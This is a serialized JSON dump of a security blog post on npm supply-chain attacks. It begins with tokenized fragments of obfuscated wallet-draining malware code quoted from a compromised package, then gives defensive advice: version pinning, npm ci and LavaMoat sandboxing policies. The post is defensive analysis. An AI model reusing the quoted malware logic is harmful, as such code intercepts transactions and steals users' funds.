_0x5ad975",{"type":27,"tag":207,"props":105830,"children":105831},{"style":226},[105832],{"type":33,"value":229},{"type":27,"tag":207,"props":105834,"children":105835},{"style":220},[105836],{"type":33,"value":105488},{"type":27,"tag":207,"props":105838,"children":105839},{"style":238},[105840],{"type":33,"value":1041},{"type":27,"tag":207,"props":105842,"children":105843},{"style":220},[105844],{"type":33,"value":105497},{"type":27,"tag":207,"props":105846,"children":105847},{"style":238},[105848],{"type":33,"value":11019},{"type":27,"tag":207,"props":105850,"children":105851},{"style":232},[105852],{"type":33,"value":1660},{"type":27,"tag":207,"props":105854,"children":105855},{"style":238},[105856],{"type":33,"value":38834},{"type":27,"tag":207,"props":105858,"children":105859},{"class":209,"line":4154},[105860,105864,105868,105873,105877,105882],{"type":27,"tag":207,"props":105861,"children":105862},{"style":376},[105863],{"type":33,"value":46532},{"type":27,"tag":207,"props":105865,"children":105866},{"style":238},[105867],{"type":33,"value":686},{"type":27,"tag":207,"props":105869,"children":105870},{"style":220},[105871],{"type":33,"value":105872},"_0x5ad975",{"type":27,"tag":207,"props":105874,"children":105875},{"style":238},[105876],{"type":33,"value":1041},{"type":27,"tag":207,"props":105878,"children":105879},{"style":220},[105880],{"type":33,"value":105881},"transaction",{"type":27,"tag":207,"props":105883,"children":105884},{"style":238},[105885],{"type":33,"value":1424},{"type":27,"tag":207,"props":105887,"children":105888},{"class":209,"line":4203},[105889,105894,105898,105902,105906,105910],{"type":27,"tag":207,"props":105890,"children":105891},{"style":220},[105892],{"type":33,"value":105893}," _0x5ad975",{"type":27,"tag":207,"props":105895,"children":105896},{"style":226},[105897],{"type":33,"value":229},{"type":27,"tag":207,"props":105899,"children":105900},{"style":220},[105901],{"type":33,"value":105828},{"type":27,"tag":207,"props":105903,"children":105904},{"style":238},[105905],{"type":33,"value":1041},{"type":27,"tag":207,"props":105907,"children":105908},{"style":220},[105909],{"type":33,"value":105881},{"type":27,"tag":207,"props":105911,"children":105912},{"style":238},[105913],{"type":33,"value":241},{"type":27,"tag":207,"props":105915,"children":105916},{"class":209,"line":4249},[105917],{"type":27,"tag":207,"props":105918,"children":105919},{"style":238},[105920],{"type":33,"value":19941},{"type":27,"tag":207,"props":105922,"children":105923},{"class":209,"line":4290},[105924,105928,105933,105937,105941,105945,105949,105953,105957],{"type":27,"tag":207,"props":105925,"children":105926},{"style":214},[105927],{"type":33,"value":38807},{"type":27,"tag":207,"props":105929,"children":105930},{"style":220},[105931],{"type":33,"value":105932}," _0x5dbe63",{"type":27,"tag":207,"props":105934,"children":105935},{"style":226},[105936],{"type":33,"value":229},{"type":27,"tag":207,"props":105938,"children":105939},{"style":1335},[105940],{"type":33,"value":105557},{"type":27,"tag":207,"props":105942,"children":105943},{"style":238},[105944],{"type":33,"value":1343},{"type":27,"tag":207,"props":105946,"children":105947},{"style":220},[105948],{"type":33,"value":105872},{"type":27,"tag":207,"props":105950,"children":105951},{"style":238},[105952],{"type":33,"value":1123},{"type":27,"tag":207,"props":105954,"children":105955},{"style":214},[105956],{"type":33,"value":15456},{"type":27,"tag":207,"props":105958,"children":105959},{"style":238},[105960],{"type":33,"value":1455},{"type":27,"tag":207,"props":105962,"children":105963},{"class":209,"line":4304},[105964,105968,105972,105976,105980,105984,105988,105992,105996,106000],{"type":27,"tag":207,"props":105965,"children":105966},{"style":376},[105967],{"type":33,"value":46532},{"type":27,"tag":207,"props":105969,"children":105970},{"style":238},[105971],{"type":33,"value":686},{"type":27,"tag":207,"props":105973,"children":105974},{"style":220},[105975],{"type":33,"value":105462},{"type":27,"tag":207,"props":105977,"children":105978},{"style":238},[105979],{"type":33,"value":1041},{"type":27,"tag":207,"props":105981,"children":105982},{"style":220},[105983],{"type":33,"value":105497},{"type":27,"tag":207,"props":105985,"children":105986},{"style":238},[105987],{"type":33,"value":11019},{"type":27,"tag":207,"props":105989,"children":105990},{"style":232},[105991],{"type":33,"value":1660},{"type":27,"tag":207,"props":105993,"children":105994},{"style":238},[105995],{"type":33,"value":57587},{"type":27,"tag":207,"props":105997,"children":105998},{"style":220},[105999],{"type":33,"value":105881},{"type":27,"tag":207,"props":106001,"children":106002},{"style":238},[106003],{"type":33,"value":1424},{"type":27,"tag":207,"props":106005,"children":106006},{"class":209,"line":5466},[106007,106012,106016,106020,106024,106028,106032,106036,106040,106044],{"type":27,"tag":207,"props":106008,"children":106009},{"style":220},[106010],{"type":33,"value":106011}," _0x2c3d7e",{"type":27,"tag":207,"props":106013,"children":106014},{"style":238},[106015],{"type":33,"value":1041},{"type":27,"tag":207,"props":106017,"children":106018},{"style":220},[106019],{"type":33,"value":105497},{"type":27,"tag":207,"props":106021,"children":106022},{"style":238},[106023],{"type":33,"value":11019},{"type":27,"tag":207,"props":106025,"children":106026},{"style":232},[106027],{"type":33,"value":1660},{"type":27,"tag":207,"props":106029,"children":106030},{"style":238},[106031],{"type":33,"value":57587},{"type":27,"tag":207,"props":106033,"children":106034},{"style":220},[106035],{"type":33,"value":105881},{"type":27,"tag":207,"props":106037,"children":106038},{"style":226},[106039],{"type":33,"value":229},{"type":27,"tag":207,"props":106041,"children":106042},{"style":220},[106043],{"type":33,"value":105932},{"type":27,"tag":207,"props":106045,"children":106046},{"style":238},[106047],{"type":33,"value":241},{"type":27,"tag":207,"props":106049,"children":106050},{"class":209,"line":5530},[106051,106055,106059],{"type":27,"tag":207,"props":106052,"children":106053},{"style":238},[106054],{"type":33,"value":46186},{"type":27,"tag":207,"props":106056,"children":106057},{"style":376},[106058],{"type":33,"value":10605},{"type":27,"tag":207,"props":106060,"children":106061},{"style":238},[106062],{"type":33,"value":384},{"type":27,"tag":207,"props":106064,"children":106065},{"class":209,"line":7900},[106066,106070,106074,106078,106082,106086,106090,106094,106098],{"type":27,"tag":207,"props":106067,"children":106068},{"style":220},[106069],{"type":33,"value":106011},{"type":27,"tag":207,"props":106071,"children":106072},{"style":238},[106073],{"type":33,"value":1041},{"type":27,"tag":207,"props":106075,"children":106076},{"style":220},[106077],{"type":33,"value":105497},{"type":27,"tag":207,"props":106079,"children":106080},{"style":238},[106081],{"type":33,"value":11019},{"type":27,"tag":207,"props":106083,"children":106084},{"style":232},[106085],{"type":33,"value":1660},{"type":27,"tag":207,"props":106087,"children":106088},{"style":238},[106089],{"type":33,"value":15942},{"type":27,"tag":207,"props":106091,"children":106092},{"style":226},[106093],{"type":33,"value":10380},{"type":27,"tag":207,"props":106095,"children":106096},{"style":220},[106097],{"type":33,"value":105932},{"type":27,"tag":207,"props":106099,"children":106100},{"style":238},[106101],{"type":33,"value":241},{"type":27,"tag":207,"props":106103,"children":106104},{"class":209,"line":7909},[106105],{"type":27,"tag":207,"props":106106,"children":106107},{"style":238},[106108],{"type":33,"value":19941},{"type":27,"tag":207,"props":106110,"children":106111},{"class":209,"line":7917},[106112,106116,106120,106124,106129],{"type":27,"tag":207,"props":106113,"children":106114},{"style":238},[106115],{"type":33,"value":23054},{"type":27,"tag":207,"props":106117,"children":106118},{"style":376},[106119],{"type":33,"value":413},{"type":27,"tag":207,"props":106121,"children":106122},{"style":238},[106123],{"type":33,"value":686},{"type":27,"tag":207,"props":106125,"children":106126},{"style":220},[106127],{"type":33,"value":106128},"_0x4b99fd",{"type":27,"tag":207,"props":106130,"children":106131},{"style":238},[106132],{"type":33,"value":105658},{"type":27,"tag":207,"props":106134,"children":106135},{"class":209,"line":7926},[106136],{"type":27,"tag":207,"props":106137,"children":106138},{"style":238},[106139],{"type":33,"value":5312},{"type":27,"tag":207,"props":106141,"children":106142},{"class":209,"line":7934},[106143],{"type":27,"tag":207,"props":106144,"children":106145},{"style":238},[106146],{"type":33,"value":451},{"type":27,"tag":58,"props":106148,"children":106150},{"id":106149},"impact-of-the-attack",[106151],{"type":33,"value":106152},"Impact of the Attack",{"type":27,"tag":36,"props":106154,"children":106155},{},[106156],{"type":33,"value":106157},"Despite the attack targeting popular NPM packages, the exploit was not very successful. After two days, the attacker's wallet was only able to drain about $1000. However, the takeaway is how easily a trusted dependency can become a delivery vector for malware.",{"type":27,"tag":28,"props":106159,"children":106161},{"id":106160},"why-it-will-happen-again",[106162],{"type":33,"value":106163},"Why It Will Happen Again",{"type":27,"tag":36,"props":106165,"children":106166},{},[106167],{"type":33,"value":106168},"The decentralized nature of the open-source ecosystem, and particularly a massive registry like NPM, makes it an attractive and persistent target for attackers. Although this recent attack was quickly mitigated and financially minor, it served as a powerful and widely-publicized proof-of-concept showing how one compromised maintainer can distribute malware at scale.",{"type":27,"tag":36,"props":106170,"children":106171},{},[106172],{"type":33,"value":106173},"With over two million packages and countless layers of direct and transitive dependencies, a compromise can cascade through thousands of projects in hours. It's the classic \"needle in a haystack\" problem, except the haystack keeps growing.",{"type":27,"tag":28,"props":106175,"children":106177},{"id":106176},"what-developers-can-do",[106178],{"type":33,"value":106179},"What Developers Can Do",{"type":27,"tag":36,"props":106181,"children":106182},{},[106183],{"type":33,"value":106184},"If you are building critical systems where supply-chain attacks are an unacceptable risk in your threat model, here are some practical actions you can take:",{"type":27,"tag":58,"props":106186,"children":106188},{"id":106187},"_1-version-pinning-in-packagejson",[106189,106191],{"type":33,"value":106190},"1. Version pinning in ",{"type":27,"tag":84,"props":106192,"children":106194},{"className":106193},[],[106195],{"type":33,"value":106196},"package.json",{"type":27,"tag":36,"props":106198,"children":106199},{},[106200],{"type":33,"value":106201},"Applications get compromised by supply-chain attacks when an attacker releases a new version of an NPM package and the application automatically downloads it to have the latest package version.",{"type":27,"tag":36,"props":106203,"children":106204},{},[106205,106207,106213,106215,106220,106222,106227],{"type":33,"value":106206},"You can pin your dependency versions to make sure they won't get updated when running ",{"type":27,"tag":84,"props":106208,"children":106210},{"className":106209},[],[106211],{"type":33,"value":106212},"npm install",{"type":33,"value":106214},". To pin it, just make sure to remove the caret ",{"type":27,"tag":84,"props":106216,"children":106218},{"className":106217},[],[106219],{"type":33,"value":56172},{"type":33,"value":106221}," symbol before the version in ",{"type":27,"tag":84,"props":106223,"children":106225},{"className":106224},[],[106226],{"type":33,"value":106196},{"type":33,"value":736},{"type":27,"tag":101,"props":106229,"children":106231},{"code":106230,"language":41253,"meta":7,"className":41251,"style":7},"\"@react-native-async-storage/async-storage\": \"1.23.1\",\n\"@react-native-community/datetimepicker\": \"8.3.0\",\n\"@react-native-community/netinfo\": \"11.4.1\",\n\"@react-native-picker/picker\": \"2.11.0\"\n",[106232],{"type":27,"tag":84,"props":106233,"children":106234},{"__ignoreMap":7},[106235,106256,106277,106298],{"type":27,"tag":207,"props":106236,"children":106237},{"class":209,"line":210},[106238,106243,106247,106252],{"type":27,"tag":207,"props":106239,"children":106240},{"style":1325},[106241],{"type":33,"value":106242},"\"@react-native-async-storage/async-storage\"",{"type":27,"tag":207,"props":106244,"children":106245},{"style":238},[106246],{"type":33,"value":22606},{"type":27,"tag":207,"props":106248,"children":106249},{"style":1325},[106250],{"type":33,"value":106251},"\"1.23.1\"",{"type":27,"tag":207,"props":106253,"children":106254},{"style":238},[106255],{"type":33,"value":1842},{"type":27,"tag":207,"props":106257,"children":106258},{"class":209,"line":244},[106259,106264,106268,106273],{"type":27,"tag":207,"props":106260,"children":106261},{"style":1325},[106262],{"type":33,"value":106263},"\"@react-native-community/datetimepicker\"",{"type":27,"tag":207,"props":106265,"children":106266},{"style":238},[106267],{"type":33,"value":22606},{"type":27,"tag":207,"props":106269,"children":106270},{"style":1325},[106271],{"type":33,"value":106272},"\"8.3.0\"",{"type":27,"tag":207,"props":106274,"children":106275},{"style":238},[106276],{"type":33,"value":1842},{"type":27,"tag":207,"props":106278,"children":106279},{"class":209,"line":270},[106280,106285,106289,106294],{"type":27,"tag":207,"props":106281,"children":106282},{"style":1325},[106283],{"type":33,"value":106284},"\"@react-native-community/netinfo\"",{"type":27,"tag":207,"props":106286,"children":106287},{"style":238},[106288],{"type":33,"value":22606},{"type":27,"tag":207,"props":106290,"children":106291},{"style":1325},[106292],{"type":33,"value":106293},"\"11.4.1\"",{"type":27,"tag":207,"props":106295,"children":106296},{"style":238},[106297],{"type":33,"value":1842},{"type":27,"tag":207,"props":106299,"children":106300},{"class":209,"line":296},[106301,106306,106310],{"type":27,"tag":207,"props":106302,"children":106303},{"style":1325},[106304],{"type":33,"value":106305},"\"@react-native-picker/picker\"",{"type":27,"tag":207,"props":106307,"children":106308},{"style":238},[106309],{"type":33,"value":22606},{"type":27,"tag":207,"props":106311,"children":106312},{"style":1325},[106313],{"type":33,"value":106314},"\"2.11.0\"\n",{"type":27,"tag":58,"props":106316,"children":106318},{"id":106317},"_2-use-npm-ci",[106319,106321],{"type":33,"value":106320},"2. Use ",{"type":27,"tag":84,"props":106322,"children":106324},{"className":106323},[],[106325],{"type":33,"value":106326},"npm ci",{"type":27,"tag":36,"props":106328,"children":106329},{},[106330,106335,106337,106343,106345,106350],{"type":27,"tag":84,"props":106331,"children":106333},{"className":106332},[],[106334],{"type":33,"value":106326},{"type":33,"value":106336}," uses the dependency versions from ",{"type":27,"tag":84,"props":106338,"children":106340},{"className":106339},[],[106341],{"type":33,"value":106342},"package-lock.json",{"type":33,"value":106344}," to install the packages. Consider using it in CI/CD workflows and only use ",{"type":27,"tag":84,"props":106346,"children":106348},{"className":106347},[],[106349],{"type":33,"value":106212},{"type":33,"value":106351}," when adding a new package or updating an existing one.",{"type":27,"tag":58,"props":106353,"children":106355},{"id":106354},"_3-implement-lavamoat",[106356,106358],{"type":33,"value":106357},"3. Implement ",{"type":27,"tag":47,"props":106359,"children":106362},{"href":106360,"rel":106361},"https://github.com/LavaMoat/LavaMoat/tree/main",[51],[106363],{"type":27,"tag":12606,"props":106364,"children":106365},{},[106366],{"type":33,"value":106367},"Lavamoat",{"type":27,"tag":36,"props":106369,"children":106370},{},[106371],{"type":33,"value":106372},"Basic hygiene helps, but it doesn’t solve the root issue: a minor utility package has the same permissions as your code. Lavamoat changes this model. Lavamoat, created by MetaMask, addresses this by sandboxing packages and enforcing least privilege. With it, even if a dependency contains malware, it cannot compromise the application.",{"type":27,"tag":36,"props":106374,"children":106375},{},[106376],{"type":33,"value":106377},"Lavamoat uses SES (Hardened JavaScript) to enforce these restrictions, limiting the globals, functions, and sub-dependencies each package can access. The rules are defined in a policy file, which looks like this:",{"type":27,"tag":101,"props":106379,"children":106381},{"code":106380,"language":41253,"meta":7,"className":41251,"style":7},"\"resources\": {\n \"@ethereumjs/util>@ethereumjs/rlp\": {\n \"globals\": {\n \"TextEncoder\": true\n }\n },\n \"@ethereumjs/util\": {\n \"globals\": {\n \"console.warn\": true,\n \"fetch\": true\n },\n \"packages\": {\n \"@ethereumjs/util>@ethereumjs/rlp\": true,\n \"@ethereumjs/util>ethereum-cryptography\": true\n }\n }\n}\n",[106382],{"type":27,"tag":84,"props":106383,"children":106384},{"__ignoreMap":7},[106385,106397,106409,106420,106436,106443,106450,106462,106473,106493,106509,106516,106527,106547,106563,106570,106577],{"type":27,"tag":207,"props":106386,"children":106387},{"class":209,"line":210},[106388,106393],{"type":27,"tag":207,"props":106389,"children":106390},{"style":1325},[106391],{"type":33,"value":106392},"\"resources\"",{"type":27,"tag":207,"props":106394,"children":106395},{"style":238},[106396],{"type":33,"value":44272},{"type":27,"tag":207,"props":106398,"children":106399},{"class":209,"line":244},[106400,106405],{"type":27,"tag":207,"props":106401,"children":106402},{"style":220},[106403],{"type":33,"value":106404}," \"@ethereumjs/util>@ethereumjs/rlp\"",{"type":27,"tag":207,"props":106406,"children":106407},{"style":238},[106408],{"type":33,"value":44272},{"type":27,"tag":207,"props":106410,"children":106411},{"class":209,"line":270},[106412,106416],{"type":27,"tag":207,"props":106413,"children":106414},{"style":220},[106415],{"type":33,"value":44280},{"type":27,"tag":207,"props":106417,"children":106418},{"style":238},[106419],{"type":33,"value":44272},{"type":27,"tag":207,"props":106421,"children":106422},{"class":209,"line":296},[106423,106428,106432],{"type":27,"tag":207,"props":106424,"children":106425},{"style":220},[106426],{"type":33,"value":106427}," \"TextEncoder\"",{"type":27,"tag":207,"props":106429,"children":106430},{"style":238},[106431],{"type":33,"value":22606},{"type":27,"tag":207,"props":106433,"children":106434},{"style":214},[106435],{"type":33,"value":44441},{"type":27,"tag":207,"props":106437,"children":106438},{"class":209,"line":445},[106439],{"type":27,"tag":207,"props":106440,"children":106441},{"style":238},[106442],{"type":33,"value":19941},{"type":27,"tag":207,"props":106444,"children":106445},{"class":209,"line":867},[106446],{"type":27,"tag":207,"props":106447,"children":106448},{"style":238},[106449],{"type":33,"value":32646},{"type":27,"tag":207,"props":106451,"children":106452},{"class":209,"line":892},[106453,106458],{"type":27,"tag":207,"props":106454,"children":106455},{"style":220},[106456],{"type":33,"value":106457}," \"@ethereumjs/util\"",{"type":27,"tag":207,"props":106459,"children":106460},{"style":238},[106461],{"type":33,"value":44272},{"type":27,"tag":207,"props":106463,"children":106464},{"class":209,"line":1475},[106465,106469],{"type":27,"tag":207,"props":106466,"children":106467},{"style":220},[106468],{"type":33,"value":44280},{"type":27,"tag":207,"props":106470,"children":106471},{"style":238},[106472],{"type":33,"value":44272},{"type":27,"tag":207,"props":106474,"children":106475},{"class":209,"line":2065},[106476,106481,106485,106489],{"type":27,"tag":207,"props":106477,"children":106478},{"style":220},[106479],{"type":33,"value":106480}," \"console.warn\"",{"type":27,"tag":207,"props":106482,"children":106483},{"style":238},[106484],{"type":33,"value":22606},{"type":27,"tag":207,"props":106486,"children":106487},{"style":214},[106488],{"type":33,"value":11278},{"type":27,"tag":207,"props":106490,"children":106491},{"style":238},[106492],{"type":33,"value":1842},{"type":27,"tag":207,"props":106494,"children":106495},{"class":209,"line":2092},[106496,106501,106505],{"type":27,"tag":207,"props":106497,"children":106498},{"style":220},[106499],{"type":33,"value":106500}," \"fetch\"",{"type":27,"tag":207,"props":106502,"children":106503},{"style":238},[106504],{"type":33,"value":22606},{"type":27,"tag":207,"props":106506,"children":106507},{"style":214},[106508],{"type":33,"value":44441},{"type":27,"tag":207,"props":106510,"children":106511},{"class":209,"line":2130},[106512],{"type":27,"tag":207,"props":106513,"children":106514},{"style":238},[106515],{"type":33,"value":44449},{"type":27,"tag":207,"props":106517,"children":106518},{"class":209,"line":2168},[106519,106523],{"type":27,"tag":207,"props":106520,"children":106521},{"style":220},[106522],{"type":33,"value":44457},{"type":27,"tag":207,"props":106524,"children":106525},{"style":238},[106526],{"type":33,"value":44272},{"type":27,"tag":207,"props":106528,"children":106529},{"class":209,"line":4095},[106530,106535,106539,106543],{"type":27,"tag":207,"props":106531,"children":106532},{"style":220},[106533],{"type":33,"value":106534}," \"@ethereumjs/util>@ethereumjs/rlp\"",{"type":27,"tag":207,"props":106536,"children":106537},{"style":238},[106538],{"type":33,"value":22606},{"type":27,"tag":207,"props":106540,"children":106541},{"style":214},[106542],{"type":33,"value":11278},{"type":27,"tag":207,"props":106544,"children":106545},{"style":238},[106546],{"type":33,"value":1842},{"type":27,"tag":207,"props":106548,"children":106549},{"class":209,"line":4103},[106550,106555,106559],{"type":27,"tag":207,"props":106551,"children":106552},{"style":220},[106553],{"type":33,"value":106554}," \"@ethereumjs/util>ethereum-cryptography\"",{"type":27,"tag":207,"props":106556,"children":106557},{"style":238},[106558],{"type":33,"value":22606},{"type":27,"tag":207,"props":106560,"children":106561},{"style":214},[106562],{"type":33,"value":44441},{"type":27,"tag":207,"props":106564,"children":106565},{"class":209,"line":4154},[106566],{"type":27,"tag":207,"props":106567,"children":106568},{"style":238},[106569],{"type":33,"value":19941},{"type":27,"tag":207,"props":106571,"children":106572},{"class":209,"line":4203},[106573],{"type":27,"tag":207,"props":106574,"children":106575},{"style":238},[106576],{"type":33,"value":10645},{"type":27,"tag":207,"props":106578,"children":106579},{"class":209,"line":4249},[106580],{"type":27,"tag":207,"props":106581,"children":106582},{"style":238},[106583],{"type":33,"value":451},{"type":27,"tag":36,"props":106585,"children":106586},{},[106587,106589,106595,106597,106603,106604,106609,106611,106617,106618,106624],{"type":33,"value":106588},"In this example, it restricts the ",{"type":27,"tag":84,"props":106590,"children":106592},{"className":106591},[],[106593],{"type":33,"value":106594},"@ethereumjs/util",{"type":33,"value":106596}," package to use only ",{"type":27,"tag":84,"props":106598,"children":106600},{"className":106599},[],[106601],{"type":33,"value":106602},"console.warn",{"type":33,"value":1131},{"type":27,"tag":84,"props":106605,"children":106607},{"className":106606},[],[106608],{"type":33,"value":41350},{"type":33,"value":106610}," functions, and to include only ",{"type":27,"tag":84,"props":106612,"children":106614},{"className":106613},[],[106615],{"type":33,"value":106616},"@ethereumjs/rlp",{"type":33,"value":1131},{"type":27,"tag":84,"props":106619,"children":106621},{"className":106620},[],[106622],{"type":33,"value":106623},"ethereum-cryptography",{"type":33,"value":106625}," packages.",{"type":27,"tag":36,"props":106627,"children":106628},{},[106629],{"type":33,"value":106630},"The policy files can be generated automatically and should be regenerated carefully, because if you generate a policy while a malicious package is installed, Lavamoat’s protection can be bypassed.",{"type":27,"tag":36,"props":106632,"children":106633},{},[106634,106636,106642],{"type":33,"value":106635},"Lavamoat also automatically freezes the global objects to prevent them being replaced or tampered with. See ",{"type":27,"tag":47,"props":106637,"children":106640},{"href":106638,"rel":106639},"https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/freeze",[51],[106641],{"type":33,"value":44627},{"type":33,"value":1041},{"type":27,"tag":58,"props":106644,"children":106646},{"id":106645},"lavamoat-vs-qix-malware",[106647],{"type":33,"value":106648},"Lavamoat vs Qix Malware",{"type":27,"tag":36,"props":106650,"children":106651},{},[106652,106654,106659],{"type":33,"value":106653},"If a dApp were compromised with the Qix malware (say it used ",{"type":27,"tag":84,"props":106655,"children":106657},{"className":106656},[],[106658],{"type":33,"value":104499},{"type":33,"value":106660},"), it would need to perform the following actions to drain funds from a wallet:",{"type":27,"tag":12719,"props":106662,"children":106663},{},[106664,106676,106687,106698],{"type":27,"tag":1232,"props":106665,"children":106666},{},[106667,106669,106674],{"type":33,"value":106668},"Replace ",{"type":27,"tag":84,"props":106670,"children":106672},{"className":106671},[],[106673],{"type":33,"value":41350},{"type":33,"value":106675}," function to a custom one",{"type":27,"tag":1232,"props":106677,"children":106678},{},[106679,106681],{"type":33,"value":106680},"Access ",{"type":27,"tag":84,"props":106682,"children":106684},{"className":106683},[],[106685],{"type":33,"value":106686},"window.ethereum",{"type":27,"tag":1232,"props":106688,"children":106689},{},[106690,106692,106697],{"type":33,"value":106691},"Call original ",{"type":27,"tag":84,"props":106693,"children":106695},{"className":106694},[],[106696],{"type":33,"value":41350},{"type":33,"value":45461},{"type":27,"tag":1232,"props":106699,"children":106700},{},[106701],{"type":33,"value":106702},"Plus other actions not relevant here",{"type":27,"tag":36,"props":106704,"children":106705},{},[106706,106708,106714],{"type":33,"value":106707},"If the dApp is using Lavamoat with a generated policy for ",{"type":27,"tag":84,"props":106709,"children":106711},{"className":106710},[],[106712],{"type":33,"value":106713},"chalk 5.6.0",{"type":33,"value":106715}," (non-malicious version) it would look like this:",{"type":27,"tag":101,"props":106717,"children":106719},{"code":106718,"language":41253,"meta":7,"className":41251,"style":7},"\"chalk\": {\n \"globals\": {\n \"navigator.userAgent\": true,\n \"navigator.userAgentData\": true\n }\n },\n",[106720],{"type":27,"tag":84,"props":106721,"children":106722},{"__ignoreMap":7},[106723,106735,106746,106766,106782,106789],{"type":27,"tag":207,"props":106724,"children":106725},{"class":209,"line":210},[106726,106731],{"type":27,"tag":207,"props":106727,"children":106728},{"style":1325},[106729],{"type":33,"value":106730},"\"chalk\"",{"type":27,"tag":207,"props":106732,"children":106733},{"style":238},[106734],{"type":33,"value":44272},{"type":27,"tag":207,"props":106736,"children":106737},{"class":209,"line":244},[106738,106742],{"type":27,"tag":207,"props":106739,"children":106740},{"style":220},[106741],{"type":33,"value":44280},{"type":27,"tag":207,"props":106743,"children":106744},{"style":238},[106745],{"type":33,"value":44272},{"type":27,"tag":207,"props":106747,"children":106748},{"class":209,"line":270},[106749,106754,106758,106762],{"type":27,"tag":207,"props":106750,"children":106751},{"style":220},[106752],{"type":33,"value":106753}," \"navigator.userAgent\"",{"type":27,"tag":207,"props":106755,"children":106756},{"style":238},[106757],{"type":33,"value":22606},{"type":27,"tag":207,"props":106759,"children":106760},{"style":214},[106761],{"type":33,"value":11278},{"type":27,"tag":207,"props":106763,"children":106764},{"style":238},[106765],{"type":33,"value":1842},{"type":27,"tag":207,"props":106767,"children":106768},{"class":209,"line":296},[106769,106774,106778],{"type":27,"tag":207,"props":106770,"children":106771},{"style":220},[106772],{"type":33,"value":106773}," \"navigator.userAgentData\"",{"type":27,"tag":207,"props":106775,"children":106776},{"style":238},[106777],{"type":33,"value":22606},{"type":27,"tag":207,"props":106779,"children":106780},{"style":214},[106781],{"type":33,"value":44441},{"type":27,"tag":207,"props":106783,"children":106784},{"class":209,"line":445},[106785],{"type":27,"tag":207,"props":106786,"children":106787},{"style":238},[106788],{"type":33,"value":19941},{"type":27,"tag":207,"props":106790,"children":106791},{"class":209,"line":867},[106792],{"type":27,"tag":207,"props":106793,"children":106794},{"style":238},[106795],{"type":33,"value":32646},{"type":27,"tag":36,"props":106797,"children":106798},{},[106799,106801,106807],{"type":33,"value":106800},"That means that the chalk dependency can only access these two global attributes from ",{"type":27,"tag":84,"props":106802,"children":106804},{"className":106803},[],[106805],{"type":33,"value":106806},"navigator",{"type":33,"value":1041},{"type":27,"tag":36,"props":106809,"children":106810},{},[106811,106813,106819],{"type":33,"value":106812},"When the compromised dApp would execute the malicious payload of ",{"type":27,"tag":84,"props":106814,"children":106816},{"className":106815},[],[106817],{"type":33,"value":106818},"chalk v5.6.1",{"type":33,"value":106820}," it would fail due to insufficient permissions:",{"type":27,"tag":36,"props":106822,"children":106823},{},[106824],{"type":27,"tag":126,"props":106825,"children":106827},{"alt":57817,"src":106826},"/posts/supply-chain-attcks/error.png",[],{"type":27,"tag":36,"props":106829,"children":106830},{},[106831,106833,106838],{"type":33,"value":106832},"This error shows that the malware failed since it cannot redefine ",{"type":27,"tag":84,"props":106834,"children":106836},{"className":106835},[],[106837],{"type":33,"value":41350},{"type":33,"value":32733},{"type":27,"tag":101,"props":106840,"children":106842},{"code":106841},"TypeError#1: Cannot define property fetch, object is not extensible\n",[106843],{"type":27,"tag":84,"props":106844,"children":106845},{"__ignoreMap":7},[106846],{"type":33,"value":106841},{"type":27,"tag":28,"props":106848,"children":106850},{"id":106849},"lavamoat-in-practice",[106851],{"type":33,"value":106852},"Lavamoat In Practice",{"type":27,"tag":36,"props":106854,"children":106855},{},[106856,106858,106865],{"type":33,"value":106857},"The OtterSec team audited the Lavamoat Webpack Plugin in late 2024 and identified vulnerabilities that attackers could abuse to bypass Lavamoat protections (",{"type":27,"tag":47,"props":106859,"children":106862},{"href":106860,"rel":106861},"https://osec.io/reports/lavamoat_audit_final.pdf",[51],[106863],{"type":33,"value":106864},"see the audit report",{"type":33,"value":28014},{"type":27,"tag":36,"props":106867,"children":106868},{},[106869],{"type":33,"value":106870},"Like any security tool, it isn’t flawless, but it represents an important shift: it minimizes what malicious code can do, rather than assuming every dependency deserves full trust. Supply-chain attacks are designed to hit as many victims as possible, not to target individual organizations. By implementing Lavamoat, you dramatically reduce your exposure and force attackers to look elsewhere.",{"type":27,"tag":28,"props":106872,"children":106873},{"id":83030},[106874],{"type":33,"value":83033},{"type":27,"tag":36,"props":106876,"children":106877},{},[106878],{"type":33,"value":106879},"The NPM incident may not have caused massive losses, but it was a clear proof-of-concept for how fragile the current model is. Supply-chain attacks will happen again, and relying on registry security alone is not enough.",{"type":27,"tag":36,"props":106881,"children":106882},{},[106883,106885,106890],{"type":33,"value":106884},"Version pinning and ",{"type":27,"tag":84,"props":106886,"children":106888},{"className":106887},[],[106889],{"type":33,"value":106326},{"type":33,"value":106891}," provide a baseline defense, but Lavamoat represents the next step: enforcing least privilege for dependencies. If you’re building critical applications, adopting and contributing to Lavamoat is one of the most effective ways to stay ahead.",{"type":27,"tag":10127,"props":106893,"children":106894},{},[106895],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":106897},[106898,106901,106902,106911,106912],{"id":104514,"depth":244,"text":104517,"children":106899},[106900],{"id":106149,"depth":270,"text":106152},{"id":106160,"depth":244,"text":106163},{"id":106176,"depth":244,"text":106179,"children":106903},[106904,106906,106908,106910],{"id":106187,"depth":270,"text":106905},"1. Version pinning in package.json",{"id":106317,"depth":270,"text":106907},"2. Use npm ci",{"id":106354,"depth":270,"text":106909},"3. Implement Lavamoat",{"id":106645,"depth":270,"text":106648},{"id":106849,"depth":244,"text":106852},{"id":83030,"depth":244,"text":83033},"content:blog:2025-09-13-how-to-survive-supply-chain-attacks.md","blog/2025-09-13-how-to-survive-supply-chain-attacks.md","blog/2025-09-13-how-to-survive-supply-chain-attacks",{"_path":106917,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":106918,"description":106919,"date":106920,"author":106921,"image":106922,"isFeatured":19,"onBlogPage":19,"tags":106924,"body":106927,"_type":10152,"_id":109250,"_source":10154,"_file":109251,"_stem":109252,"_extension":10157},"/blog/2025-10-16-how-we-broke-exchanges-oauth-misconfigurations","How We Broke Exchanges: A Deep Dive Into Authentication And Client-Side Bugs","OAuth misconfigurations show how common dev settings can lead to account takeovers. Explore real cases where failing to account for differences between desktop and mobile environments left SDKs, exchanges, and wallets vulnerable to 